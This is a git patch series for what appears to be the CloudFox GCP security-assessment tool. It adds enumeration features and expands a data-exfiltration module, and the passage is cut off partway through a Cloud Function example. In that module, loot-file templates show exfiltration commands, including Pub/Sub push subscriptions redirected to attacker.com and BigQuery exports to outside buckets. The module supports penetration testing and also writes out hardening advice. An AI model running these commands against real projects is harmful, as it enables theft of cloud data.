-5", name, name) + } +} + // getZoneIAMBindings retrieves IAM bindings for a DNS managed zone func (ds *DNSService) getZoneIAMBindings(service *dns.Service, ctx context.Context, projectID, zoneName string) []IAMBinding { var bindings []IAMBinding diff --git a/gcp/services/filestoreService/filestoreService.go b/gcp/services/filestoreService/filestoreService.go index 837d259f..42a69632 100644 --- a/gcp/services/filestoreService/filestoreService.go +++ b/gcp/services/filestoreService/filestoreService.go @@ -27,11 +27,21 @@ type FilestoreInstanceInfo struct { IPAddresses []string `json:"ipAddresses"` Shares []ShareInfo `json:"shares"` CreateTime string `json:"createTime"` + Protocol string `json:"protocol"` // NFS_V3, NFS_V4_1 } type ShareInfo struct { - Name string `json:"name"` - CapacityGB int64 `json:"capacityGb"` + Name string `json:"name"` + CapacityGB int64 `json:"capacityGb"` + NfsExportOptions []NfsExportOption `json:"nfsExportOptions"` +} + +type NfsExportOption struct { + IPRanges []string `json:"ipRanges"` + AccessMode string `json:"accessMode"` // READ_ONLY, READ_WRITE + SquashMode string `json:"squashMode"` // NO_ROOT_SQUASH, ROOT_SQUASH + AnonUID int64 `json:"anonUid"` + AnonGID int64 `json:"anonGid"` } func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceInfo, error) { @@ -54,6 +64,7 @@ func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceI Tier: instance.Tier, State: instance.State, CreateTime: instance.CreateTime, + Protocol: instance.Protocol, // NFS_V3, NFS_V4_1 } if len(instance.Networks) > 0 { @@ -62,10 +73,24 @@ func (s *FilestoreService) ListInstances(projectID string) ([]FilestoreInstanceI } for _, share := range instance.FileShares { - info.Shares = append(info.Shares, ShareInfo{ + shareInfo := ShareInfo{ Name: share.Name, CapacityGB: share.CapacityGb, - }) + } + + // Parse NFS export options + for _, opt := range share.NfsExportOptions { + exportOpt := NfsExportOption{ + IPRanges: opt.IpRanges, + AccessMode: opt.AccessMode, + SquashMode: opt.SquashMode, + AnonUID: opt.AnonUid, + AnonGID: opt.AnonGid, + } + shareInfo.NfsExportOptions = append(shareInfo.NfsExportOptions, exportOpt) + } + + info.Shares = append(info.Shares, shareInfo) } instances = append(instances, info) } diff --git a/gcp/services/schedulerService/schedulerService.go b/gcp/services/schedulerService/schedulerService.go index 69b617a7..6496d957 100644 --- a/gcp/services/schedulerService/schedulerService.go +++ b/gcp/services/schedulerService/schedulerService.go @@ -4,11 +4,33 @@ import ( "context" "fmt" "strings" + "sync" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" scheduler "google.golang.org/api/cloudscheduler/v1" ) +// schedulerRegions contains all Cloud Scheduler regions +// Note: Cloud Scheduler API does NOT support the "-" wildcard for locations +// so we need to iterate through regions explicitly +var schedulerRegions = []string{ + // Americas + "northamerica-northeast1", "northamerica-northeast2", + "southamerica-east1", "southamerica-west1", + "us-central1", "us-east1", "us-east4", "us-east5", + "us-south1", "us-west1", "us-west2", "us-west3", "us-west4", + // Europe + "europe-central2", "europe-north1", + "europe-southwest1", "europe-west1", "europe-west2", "europe-west3", + "europe-west4", "europe-west6", "europe-west8", "europe-west9", + // Asia Pacific + "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", + "asia-south1", "asia-south2", "asia-southeast1", "asia-southeast2", + "australia-southeast1", "australia-southeast2", + // Middle East & Africa + "africa-south1", "me-central1", "me-west1", +} + type SchedulerService struct{} func New() *SchedulerService { @@ -48,7 +70,9 @@ type JobInfo struct { Status string // Last attempt status } -// Jobs retrieves all Cloud Scheduler jobs in a project +// Jobs retrieves all Cloud Scheduler jobs in a project across all regions +// Note: The Cloud Scheduler API does NOT support the "-" wildcard for locations +// so we must iterate through regions explicitly func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { ctx := context.Background() @@ -58,21 +82,52 @@ func (ss *SchedulerService) Jobs(projectID string) ([]JobInfo, error) { } var jobs []JobInfo + var mu sync.Mutex + var wg sync.WaitGroup + var lastErr error + var errMu sync.Mutex + + // Use a semaphore to limit concurrent API calls + semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + + // Iterate through all Scheduler regions in parallel + for _, region := range schedulerRegions { + wg.Add(1) + go func(region string) { + defer wg.Done() + + // Acquire semaphore + semaphore <- struct{}{} + defer func() { <-semaphore }() + + parent := fmt.Sprintf("projects/%s/locations/%s", projectID, region) + + call := service.Projects.Locations.Jobs.List(parent) + err := call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { + for _, job := range page.Jobs { + info := parseJobInfo(job, projectID) + mu.Lock() + jobs = append(jobs, info) + mu.Unlock() + } + return nil + }) + + if err != nil { + // Track the last error but continue - region may not have jobs or API may not be enabled + errMu.Lock() + lastErr = err + errMu.Unlock() + } + }(region) + } - // List jobs across all locations - parent := fmt.Sprintf("projects/%s/locations/-", projectID) + wg.Wait() - call := service.Projects.Locations.Jobs.List(parent) - err = call.Pages(ctx, func(page *scheduler.ListJobsResponse) error { - for _, job := range page.Jobs { - info := parseJobInfo(job, projectID) - jobs = append(jobs, info) - } - return nil - }) - - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "cloudscheduler.googleapis.com") + // Only return error if we got no jobs AND had errors + // If we found jobs in some regions, that's success + if len(jobs) == 0 && lastErr != nil { + return nil, gcpinternal.ParseGCPError(lastErr, "cloudscheduler.googleapis.com") } return jobs, nil diff --git a/globals/gcp.go b/globals/gcp.go index 42cd4ae6..4fb8de95 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -52,6 +52,7 @@ const GCP_ORGPOLICIES_MODULE_NAME string = "org-policies" const GCP_BUCKETENUM_MODULE_NAME string = "bucket-enum" const GCP_CROSSPROJECT_MODULE_NAME string = "cross-project" const GCP_PUBLICRESOURCES_MODULE_NAME string = "public-resources" +const GCP_PUBLICACCESS_MODULE_NAME string = "public-access" const GCP_SOURCEREPOS_MODULE_NAME string = "source-repos" const GCP_LOGGINGGAPS_MODULE_NAME string = "logging-gaps" const GCP_SSHOSLOGIN_MODULE_NAME string = "ssh-oslogin" diff --git a/internal/log.go b/internal/log.go index 007ff275..e473a458 100644 --- a/internal/log.go +++ b/internal/log.go @@ -19,6 +19,8 @@ func init() { text.EnableColors() } +// Note: clearln is defined in aws.go as "\r\x1b[2K" and is used to clear spinner status lines + // This function returns ~/.cloudfox. // If the folder does not exist the function creates it. func GetLogDirPath() *string { @@ -54,7 +56,7 @@ func (l *Logger) Info(text string) { func (l *Logger) InfoM(text string, module string) { var cyan = color.New(color.FgCyan).SprintFunc() - fmt.Printf("[%s][%s] %s\n", cyan(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), cyan(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", cyan(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), cyan(module), text) } func (l *Logger) Success(text string) { @@ -62,7 +64,7 @@ func (l *Logger) Success(text string) { } func (l *Logger) SuccessM(text string, module string) { var green = color.New(color.FgGreen).SprintFunc() - fmt.Printf("[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", green(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), green(module), text) } func (l *Logger) Error(text string) { @@ -71,7 +73,7 @@ func (l *Logger) Error(text string) { func (l *Logger) ErrorM(text string, module string) { var red = color.New(color.FgRed).SprintFunc() - fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) if l.txtLog != nil { l.txtLog.Printf("[%s] %s", module, text) } @@ -86,6 +88,6 @@ func (l *Logger) FatalM(text string, module string) { if l.txtLog != nil { l.txtLog.Printf("[%s] %s", module, text) } - fmt.Printf("[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) + fmt.Printf(clearln+"[%s][%s] %s\n", red(emoji.Sprintf(":fox:cloudfox %s :fox:", l.version)), red(module), text) os.Exit(1) } From 8954fc2a7291d5e7c0bad793a58b4dc304e19b73 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 13 Jan 2026 15:37:53 -0500 Subject: [PATCH 12/48] fixed permissions denied error --- internal/gcp/base.go | 29 ++++++++++++++++++++++------- 1 file changed, 22 insertions(+), 7 deletions(-) diff --git a/internal/gcp/base.go b/internal/gcp/base.go index dfa8ec3c..e3f89a00 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -19,9 +19,10 @@ import ( // Common GCP API Error Types // ------------------------------ var ( - ErrAPINotEnabled = errors.New("API not enabled") - ErrPermissionDenied = errors.New("permission denied") - ErrNotFound = errors.New("resource not found") + ErrAPINotEnabled = errors.New("API not enabled") + ErrPermissionDenied = errors.New("permission denied") + ErrNotFound = errors.New("resource not found") + ErrVPCServiceControls = errors.New("blocked by VPC Service Controls") ) // ParseGCPError converts GCP API errors into cleaner, standardized error types @@ -79,6 +80,12 @@ func ParseGCPError(err error, apiName string) error { if strings.Contains(errStr, "SERVICE_DISABLED") { return fmt.Errorf("%w: %s", ErrAPINotEnabled, apiName) } + // Check for VPC Service Controls + if strings.Contains(errStr, "VPC_SERVICE_CONTROLS") || + strings.Contains(errStr, "SECURITY_POLICY_VIOLATED") || + strings.Contains(errStr, "organization's policy") { + return ErrVPCServiceControls + } // Permission denied if strings.Contains(errStr, "PERMISSION_DENIED") || strings.Contains(errStr, "does not have") || @@ -128,21 +135,29 @@ func HandleGCPError(err error, logger internal.Logger, moduleName string, resour return true // No error, continue } + // Parse the raw GCP error into a standardized error type + parsedErr := ParseGCPError(err, "") + switch { - case errors.Is(err, ErrAPINotEnabled): + case errors.Is(parsedErr, ErrAPINotEnabled): logger.ErrorM(fmt.Sprintf("%s - API not enabled", resourceDesc), moduleName) return false // Can't continue without API enabled - case errors.Is(err, ErrPermissionDenied): + case errors.Is(parsedErr, ErrVPCServiceControls): + logger.ErrorM(fmt.Sprintf("%s - blocked by VPC Service Controls", resourceDesc), moduleName) + return true // Can continue with other resources + + case errors.Is(parsedErr, ErrPermissionDenied): logger.ErrorM(fmt.Sprintf("%s - permission denied", resourceDesc), moduleName) return true // Can continue with other resources - case errors.Is(err, ErrNotFound): + case errors.Is(parsedErr, ErrNotFound): // Not found is often expected, don't log as error return true default: - logger.ErrorM(fmt.Sprintf("%s: %v", resourceDesc, err), moduleName) + // For unknown errors, log a concise message without the full error details + logger.ErrorM(fmt.Sprintf("%s - error occurred", resourceDesc), moduleName) return true // Continue with other resources } } From ce545ca9ff01281934cc225d3a1db4431e45d13f Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 13 Jan 2026 16:23:08 -0500 Subject: [PATCH 13/48] updated dataexfil --- README.md | 2 +- gcp/commands/dataexfiltration.go | 803 +++++++++++++++++++++++++++---- 2 files changed, 708 insertions(+), 97 deletions(-) diff --git a/README.md b/README.md index af82060a..62f74138 100644 --- a/README.md +++ b/README.md @@ -253,7 +253,7 @@ Additional policy notes (as of 09/2022): | Provider | Command Name | Description | | - | - | - | | GCP | lateral-movement | Map lateral movement paths, credential theft vectors, and pivot opportunities | -| GCP | data-exfiltration | Identify data exfiltration paths with VPC-SC and Org Policy protection status | +| GCP | data-exfiltration | Identify data exfiltration paths, potential vectors, and missing security hardening | | GCP | public-access | Find resources with allUsers/allAuthenticatedUsers access across 16 GCP services | | GCP | cross-project | Analyze cross-project IAM bindings, logging sinks, and Pub/Sub exports for lateral movement | diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index ac134020..834e3e58 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -16,7 +16,9 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + cloudfunctions "google.golang.org/api/cloudfunctions/v1" compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" sqladmin "google.golang.org/api/sqladmin/v1" storage "google.golang.org/api/storage/v1" storagetransfer "google.golang.org/api/storagetransfer/v1" @@ -29,25 +31,30 @@ var GCPDataExfiltrationCommand = &cobra.Command{ Use: GCP_DATAEXFILTRATION_MODULE_NAME, Aliases: []string{"exfil", "data-exfil", "exfiltration"}, Short: "Identify data exfiltration paths and high-risk data exposure", - Long: `Identify REAL data exfiltration vectors and paths in GCP environments. + Long: `Identify data exfiltration vectors and paths in GCP environments. -This module enumerates actual configurations, NOT generic assumptions. +This module identifies both ACTUAL misconfigurations and POTENTIAL exfiltration vectors. -Features: +Actual Findings (specific resources): - Public snapshots and images (actual IAM policy check) - Public buckets (actual IAM policy check) - Cross-project logging sinks (actual sink enumeration) - Pub/Sub push subscriptions to external endpoints -- Pub/Sub subscriptions exporting to BigQuery/GCS - BigQuery datasets with public IAM bindings -- Cloud SQL instances with export configurations -- Storage Transfer Service jobs to external destinations (AWS S3, Azure Blob) +- Storage Transfer Service jobs to external destinations + +Potential Vectors (capabilities that exist): +- BigQuery Export: Can export data to GCS bucket or external table +- Pub/Sub Subscription: Can push messages to external HTTP endpoint +- Cloud Function: Can make outbound HTTP requests to external endpoints +- Cloud Run: Can make outbound HTTP requests to external endpoints +- Logging Sink: Can export logs to external project or Pub/Sub topic Security Controls Checked: - VPC Service Controls (VPC-SC) perimeter protection -- Organization policies: storage.publicAccessPrevention, iam.allowedPolicyMemberDomains, sql.restrictPublicIp +- Organization policies for data protection -Each finding is based on actual resource configuration, not assumptions.`, +The loot file includes commands to perform each type of exfiltration.`, Run: runGCPDataExfiltrationCommand, } @@ -55,6 +62,7 @@ Each finding is based on actual resource configuration, not assumptions.`, // Data Structures // ------------------------------ +// ExfiltrationPath represents an actual misconfiguration or finding type ExfiltrationPath struct { PathType string // Category of exfiltration ResourceName string // Specific resource @@ -67,6 +75,16 @@ type ExfiltrationPath struct { VPCSCProtected bool // Is this project protected by VPC-SC? } +// PotentialVector represents a potential exfiltration capability (not necessarily misconfigured) +type PotentialVector struct { + VectorType string // Category: BigQuery Export, Pub/Sub, Cloud Function, etc. + ResourceName string // Specific resource or "*" for generic + ProjectID string // Project ID + Description string // What this vector enables + Destination string // Where data could go + ExploitCommand string // Command to exploit this vector +} + type PublicExport struct { ResourceType string ResourceName string @@ -79,12 +97,26 @@ type PublicExport struct { // OrgPolicyProtection tracks which org policies protect a project from data exfiltration type OrgPolicyProtection struct { - ProjectID string - PublicAccessPrevention bool // storage.publicAccessPrevention enforced - DomainRestriction bool // iam.allowedPolicyMemberDomains enforced - SQLPublicIPRestriction bool // sql.restrictPublicIp enforced + ProjectID string + PublicAccessPrevention bool // storage.publicAccessPrevention enforced + DomainRestriction bool // iam.allowedPolicyMemberDomains enforced + SQLPublicIPRestriction bool // sql.restrictPublicIp enforced ResourceLocationRestriction bool // gcp.resourceLocations enforced - MissingProtections []string + CloudFunctionsVPCConnector bool // cloudfunctions.requireVPCConnector enforced + CloudRunIngressRestriction bool // run.allowedIngress enforced + CloudRunRequireIAMInvoker bool // run.allowedIngress = internal or internal-and-cloud-load-balancing + DisableBQOmniAWS bool // bigquery.disableBQOmniAWS enforced + DisableBQOmniAzure bool // bigquery.disableBQOmniAzure enforced + MissingProtections []string +} + +// MissingHardening represents a security configuration that should be enabled +type MissingHardening struct { + ProjectID string + Category string // Storage, BigQuery, Compute, etc. + Control string // Org policy or configuration name + Description string // What this protects against + Recommendation string // How to enable it } // ------------------------------ @@ -93,11 +125,12 @@ type OrgPolicyProtection struct { type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ExfiltrationPaths []ExfiltrationPath - PublicExports []PublicExport - LootMap map[string]*internal.LootFile - mu sync.Mutex - vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + ExfiltrationPaths []ExfiltrationPath + PotentialVectors []PotentialVector + PublicExports []PublicExport + LootMap map[string]*internal.LootFile + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project } @@ -124,6 +157,7 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { module := &DataExfiltrationModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ExfiltrationPaths: []ExfiltrationPath{}, + PotentialVectors: []PotentialVector{}, PublicExports: []PublicExport{}, LootMap: make(map[string]*internal.LootFile), vpcscProtectedProj: make(map[string]bool), @@ -138,7 +172,7 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Identifying data exfiltration paths...", GCP_DATAEXFILTRATION_MODULE_NAME) + logger.InfoM("Identifying data exfiltration paths and potential vectors...", GCP_DATAEXFILTRATION_MODULE_NAME) // First, check VPC-SC protection status for all projects m.checkVPCSCProtection(ctx, logger) @@ -149,14 +183,26 @@ func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Lo // Process each project m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_DATAEXFILTRATION_MODULE_NAME, m.processProject) + // Generate hardening recommendations + hardeningRecs := m.generateMissingHardeningRecommendations() + // Check results - if len(m.ExfiltrationPaths) == 0 && len(m.PublicExports) == 0 { - logger.InfoM("No data exfiltration paths found", GCP_DATAEXFILTRATION_MODULE_NAME) + hasResults := len(m.ExfiltrationPaths) > 0 || len(m.PotentialVectors) > 0 || len(hardeningRecs) > 0 + + if !hasResults { + logger.InfoM("No data exfiltration paths, vectors, or hardening gaps found", GCP_DATAEXFILTRATION_MODULE_NAME) return } - logger.SuccessM(fmt.Sprintf("Found %d exfiltration path(s) and %d public export(s)", - len(m.ExfiltrationPaths), len(m.PublicExports)), GCP_DATAEXFILTRATION_MODULE_NAME) + if len(m.ExfiltrationPaths) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d actual misconfiguration(s)", len(m.ExfiltrationPaths)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + if len(m.PotentialVectors) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d potential exfiltration vector(s)", len(m.PotentialVectors)), GCP_DATAEXFILTRATION_MODULE_NAME) + } + if len(hardeningRecs) > 0 { + logger.InfoM(fmt.Sprintf("Found %d hardening recommendation(s)", len(hardeningRecs)), GCP_DATAEXFILTRATION_MODULE_NAME) + } m.writeOutput(ctx, logger) } @@ -248,6 +294,28 @@ func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, l if policy.Enforced || len(policy.AllowedValues) > 0 { protection.ResourceLocationRestriction = true } + case "constraints/cloudfunctions.requireVPCConnector": + if policy.Enforced { + protection.CloudFunctionsVPCConnector = true + } + case "constraints/run.allowedIngress": + // Check if ingress is restricted to internal or internal-and-cloud-load-balancing + if len(policy.AllowedValues) > 0 { + for _, val := range policy.AllowedValues { + if val == "internal" || val == "internal-and-cloud-load-balancing" { + protection.CloudRunIngressRestriction = true + break + } + } + } + case "constraints/bigquery.disableBQOmniAWS": + if policy.Enforced { + protection.DisableBQOmniAWS = true + } + case "constraints/bigquery.disableBQOmniAzure": + if policy.Enforced { + protection.DisableBQOmniAzure = true + } } } @@ -261,6 +329,18 @@ func (m *DataExfiltrationModule) checkOrgPolicyProtection(ctx context.Context, l if !protection.SQLPublicIPRestriction { protection.MissingProtections = append(protection.MissingProtections, "sql.restrictPublicIp not enforced") } + if !protection.CloudFunctionsVPCConnector { + protection.MissingProtections = append(protection.MissingProtections, "cloudfunctions.requireVPCConnector not enforced") + } + if !protection.CloudRunIngressRestriction { + protection.MissingProtections = append(protection.MissingProtections, "run.allowedIngress not restricted") + } + if !protection.DisableBQOmniAWS { + protection.MissingProtections = append(protection.MissingProtections, "bigquery.disableBQOmniAWS not enforced") + } + if !protection.DisableBQOmniAzure { + protection.MissingProtections = append(protection.MissingProtections, "bigquery.disableBQOmniAzure not enforced") + } m.mu.Lock() m.orgPolicyProtection[projectID] = protection @@ -277,6 +357,189 @@ func (m *DataExfiltrationModule) isOrgPolicyProtected(projectID string) bool { return false } +// generateMissingHardeningRecommendations creates a list of hardening recommendations for each project +func (m *DataExfiltrationModule) generateMissingHardeningRecommendations() []MissingHardening { + var recommendations []MissingHardening + + for _, projectID := range m.ProjectIDs { + protection, ok := m.orgPolicyProtection[projectID] + if !ok { + // No protection data available - recommend all controls + protection = &OrgPolicyProtection{ProjectID: projectID} + } + + // Storage protections + if !protection.PublicAccessPrevention { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "Storage", + Control: "storage.publicAccessPrevention", + Description: "Prevents GCS buckets from being made public via IAM policies", + Recommendation: `# Enable via org policy (recommended at org/folder level) +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/storage.publicAccessPrevention +# spec: +# rules: +# - enforce: true + +# Or enable per-bucket: +gcloud storage buckets update gs://BUCKET_NAME --public-access-prevention`, + }) + } + + // IAM protections + if !protection.DomainRestriction { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "IAM", + Control: "iam.allowedPolicyMemberDomains", + Description: "Restricts IAM policy members to specific domains only (prevents allUsers/allAuthenticatedUsers)", + Recommendation: `# Enable via org policy (recommended at org/folder level) +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/iam.allowedPolicyMemberDomains +# spec: +# rules: +# - values: +# allowedValues: +# - C0xxxxxxx # Your Cloud Identity/Workspace customer ID +# - is:example.com # Or domain restriction`, + }) + } + + // Cloud SQL protections + if !protection.SQLPublicIPRestriction { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "Cloud SQL", + Control: "sql.restrictPublicIp", + Description: "Prevents Cloud SQL instances from having public IP addresses", + Recommendation: `# Enable via org policy +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/sql.restrictPublicIp +# spec: +# rules: +# - enforce: true`, + }) + } + + // Cloud Functions protections + if !protection.CloudFunctionsVPCConnector { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "Cloud Functions", + Control: "cloudfunctions.requireVPCConnector", + Description: "Requires Cloud Functions to use VPC connector for egress (prevents direct internet access)", + Recommendation: `# Enable via org policy +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/cloudfunctions.requireVPCConnector +# spec: +# rules: +# - enforce: true + +# Note: Requires VPC connector to be configured in the VPC`, + }) + } + + // Cloud Run protections + if !protection.CloudRunIngressRestriction { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "Cloud Run", + Control: "run.allowedIngress", + Description: "Restricts Cloud Run ingress to internal traffic only (prevents public access)", + Recommendation: `# Enable via org policy +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/run.allowedIngress +# spec: +# rules: +# - values: +# allowedValues: +# - internal # Only allow internal traffic +# # Or: internal-and-cloud-load-balancing + +# Per-service setting: +gcloud run services update SERVICE --ingress=internal --region=REGION`, + }) + } + + // BigQuery protections - AWS + if !protection.DisableBQOmniAWS { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "BigQuery", + Control: "bigquery.disableBQOmniAWS", + Description: "Prevents BigQuery Omni connections to AWS (blocks cross-cloud data access)", + Recommendation: `# Enable via org policy +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/bigquery.disableBQOmniAWS +# spec: +# rules: +# - enforce: true`, + }) + } + + // BigQuery protections - Azure + if !protection.DisableBQOmniAzure { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "BigQuery", + Control: "bigquery.disableBQOmniAzure", + Description: "Prevents BigQuery Omni connections to Azure (blocks cross-cloud data access)", + Recommendation: `# Enable via org policy +gcloud org-policies set-policy --project=PROJECT_ID policy.yaml + +# policy.yaml contents: +# name: projects/PROJECT_ID/policies/bigquery.disableBQOmniAzure +# spec: +# rules: +# - enforce: true`, + }) + } + + // Check VPC-SC protection status + if !m.vpcscProtectedProj[projectID] { + recommendations = append(recommendations, MissingHardening{ + ProjectID: projectID, + Category: "VPC Service Controls", + Control: "VPC-SC Perimeter", + Description: "VPC Service Controls create a security perimeter that prevents data exfiltration from GCP APIs", + Recommendation: `# VPC-SC requires Access Context Manager at organization level + +# 1. Create an access policy (org-level, one-time) +gcloud access-context-manager policies create --organization=ORG_ID --title="Policy" + +# 2. Create a service perimeter +gcloud access-context-manager perimeters create NAME \ + --title="Data Protection Perimeter" \ + --resources=projects/PROJECT_NUMBER \ + --restricted-services=storage.googleapis.com,bigquery.googleapis.com \ + --policy=POLICY_ID + +# Restricted services commonly include: +# - storage.googleapis.com (GCS) +# - bigquery.googleapis.com (BigQuery) +# - pubsub.googleapis.com (Pub/Sub) +# - logging.googleapis.com (Cloud Logging) +# - secretmanager.googleapis.com (Secret Manager)`, + }) + } + } + + return recommendations +} + // ------------------------------ // Project Processor // ------------------------------ @@ -285,6 +548,8 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s logger.InfoM(fmt.Sprintf("Analyzing exfiltration paths in project: %s", projectID), GCP_DATAEXFILTRATION_MODULE_NAME) } + // === ACTUAL MISCONFIGURATIONS === + // 1. Find public/shared snapshots (REAL check) m.findPublicSnapshots(ctx, projectID, logger) @@ -311,6 +576,23 @@ func (m *DataExfiltrationModule) processProject(ctx context.Context, projectID s // 9. Find Storage Transfer jobs to external destinations m.findStorageTransferJobs(ctx, projectID, logger) + + // === POTENTIAL EXFILTRATION VECTORS === + + // 10. Check for BigQuery export capability + m.checkBigQueryExportCapability(ctx, projectID, logger) + + // 11. Check for Pub/Sub subscription capability + m.checkPubSubCapability(ctx, projectID, logger) + + // 12. Check for Cloud Function capability + m.checkCloudFunctionCapability(ctx, projectID, logger) + + // 13. Check for Cloud Run capability + m.checkCloudRunCapability(ctx, projectID, logger) + + // 14. Check for Logging sink capability + m.checkLoggingSinkCapability(ctx, projectID, logger) } // findPublicSnapshots finds snapshots that are publicly accessible @@ -855,6 +1137,256 @@ func (m *DataExfiltrationModule) findStorageTransferJobs(ctx context.Context, pr } } +// ------------------------------ +// Potential Vector Checks +// ------------------------------ + +// checkBigQueryExportCapability checks if BigQuery datasets exist (can export to GCS/external) +func (m *DataExfiltrationModule) checkBigQueryExportCapability(ctx context.Context, projectID string, logger internal.Logger) { + bq := bigqueryservice.New() + datasets, err := bq.BigqueryDatasets(projectID) + if err != nil { + return // Silently skip - API may not be enabled + } + + if len(datasets) > 0 { + vector := PotentialVector{ + VectorType: "BigQuery Export", + ResourceName: "*", + ProjectID: projectID, + Description: "BigQuery can export data to GCS bucket or external table", + Destination: "GCS bucket or external table", + ExploitCommand: fmt.Sprintf(`# List all datasets in project +bq ls --project_id=%s + +# List tables in a dataset +bq ls %s:DATASET_NAME + +# Export table to GCS (requires storage.objects.create on bucket) +bq extract --destination_format=CSV '%s:DATASET.TABLE' gs://YOUR_BUCKET/export.csv + +# Export to external table (federated query) +bq query --use_legacy_sql=false 'SELECT * FROM EXTERNAL_QUERY("connection_id", "SELECT * FROM table")' + +# Create external table pointing to GCS +bq mk --external_table_definition=gs://bucket/file.csv@CSV DATASET.external_table`, projectID, projectID, projectID), + } + + m.mu.Lock() + m.PotentialVectors = append(m.PotentialVectors, vector) + m.addPotentialVectorToLoot(vector) + m.mu.Unlock() + } +} + +// checkPubSubCapability checks if Pub/Sub topics/subscriptions exist +func (m *DataExfiltrationModule) checkPubSubCapability(ctx context.Context, projectID string, logger internal.Logger) { + ps := pubsubservice.New() + subs, err := ps.Subscriptions(projectID) + if err != nil { + return // Silently skip + } + + if len(subs) > 0 { + vector := PotentialVector{ + VectorType: "Pub/Sub Subscription", + ResourceName: "*", + ProjectID: projectID, + Description: "Pub/Sub can push messages to external HTTP endpoint", + Destination: "External HTTP endpoint", + ExploitCommand: fmt.Sprintf(`# List all subscriptions +gcloud pubsub subscriptions list --project=%s + +# Create a push subscription to external endpoint (requires pubsub.subscriptions.create) +gcloud pubsub subscriptions create exfil-sub \ + --topic=TOPIC_NAME \ + --push-endpoint=https://attacker.com/collect \ + --project=%s + +# Pull messages from existing subscription (requires pubsub.subscriptions.consume) +gcloud pubsub subscriptions pull SUB_NAME --auto-ack --limit=100 --project=%s + +# Modify existing subscription to push to external endpoint +gcloud pubsub subscriptions modify-push-config SUB_NAME \ + --push-endpoint=https://attacker.com/collect \ + --project=%s`, projectID, projectID, projectID, projectID), + } + + m.mu.Lock() + m.PotentialVectors = append(m.PotentialVectors, vector) + m.addPotentialVectorToLoot(vector) + m.mu.Unlock() + } +} + +// checkCloudFunctionCapability checks if Cloud Functions exist +func (m *DataExfiltrationModule) checkCloudFunctionCapability(ctx context.Context, projectID string, logger internal.Logger) { + functionsService, err := cloudfunctions.NewService(ctx) + if err != nil { + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := functionsService.Projects.Locations.Functions.List(parent).Do() + if err != nil { + return // Silently skip + } + + if len(resp.Functions) > 0 { + vector := PotentialVector{ + VectorType: "Cloud Function", + ResourceName: "*", + ProjectID: projectID, + Description: "Cloud Functions can make outbound HTTP requests to external endpoints", + Destination: "External HTTP endpoint", + ExploitCommand: fmt.Sprintf(`# List all Cloud Functions +gcloud functions list --project=%s + +# If you can update function code, add exfiltration logic: +# - Read secrets/data from project resources +# - Send HTTP POST to external endpoint + +# Example: Deploy function that exfiltrates data +# function code (index.js): +# const https = require('https'); +# exports.exfil = (req, 